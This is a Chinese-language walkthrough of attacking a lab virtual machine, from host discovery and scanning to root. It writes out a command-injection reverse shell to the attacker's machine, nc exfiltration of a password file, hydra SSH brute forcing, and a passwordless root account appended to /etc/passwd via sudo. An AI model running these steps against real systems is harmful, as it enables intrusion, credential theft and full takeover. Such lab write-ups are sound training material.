目录
导入靶机
点击重试
然后网卡换成 NAT模式,开启靶机
信息收集
发现IP
arp-scan -l
发现靶机是 192.168.109.162
目录扫描
python3 dirsearch.py -u 192.168.109.162
扫出来的目录基本都是跳转到了 index.php
端口扫描
nmap -p- -A 192.168.109.162
发现只有 22 和 80 端口
访问 web
弱口令爆破
准备用Burp 爆破来着,但突然发现密码 admin 可以登录上去
发现可以执行系统命令,然后抓包,发现 radio 这里可以修改命令
反弹shell
在 kali 开启监听端口
nc -lvvp 8888
替换 payload,然后发包,返回 kali 发现反弹shell 成功
nc+-e+/bin/bash+192.168.109.139+8888
获得交互式 shell
python -c 'import pty;pty.spawn("/bin/bash")'
提权
进入根目录的家目录,经过一番查看在 jim 用户下发现了一个密码字典
通过 nc 把 old-passwords.bak 的内容传入到 kali,用于 ssh 的暴力破解
先在 kali 用 nc 监听一个端口 4444
,并把监听到的数据写入 pwd.txt
rlwrap nc -lvnp 4444 > pwd.txt
nc 192.168.109.139 4444 < old-passwords.bak
发现传入成功
使用 hydra 暴力破解
- -l: 指定用户 jim
- -P:指定密码字典
- -vV:显示详细信息
- -f:破解成功之后立马停止爆破
hydra -l jim -P pwd.txt -vV -f ssh://192.168.109.162
破解得到 jim 的密码是 jibril04
SSH 连接 jim 用户
ssh jim@192.168.109.162
继续查看 jim 用户里的内容
cat /home/jim/mbox
看上去像是邮件,再去 /var/mail 查看邮件
cat /var/mail/jim
发现了 Charles 的密码是 ^xHhA&hvim0y
登录charles账户
ssh charles@192.168.109.162
sudo -l
发现 charles 用户有执行 teehee 命令的权限
使用 teehee 创建 root 用户
echo "egg::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
tail -l /etc/passwd
在 jim 用户切换 root 权限用户,然后在 root 目录发现了 flag.txt 文件,在里面发现了 flag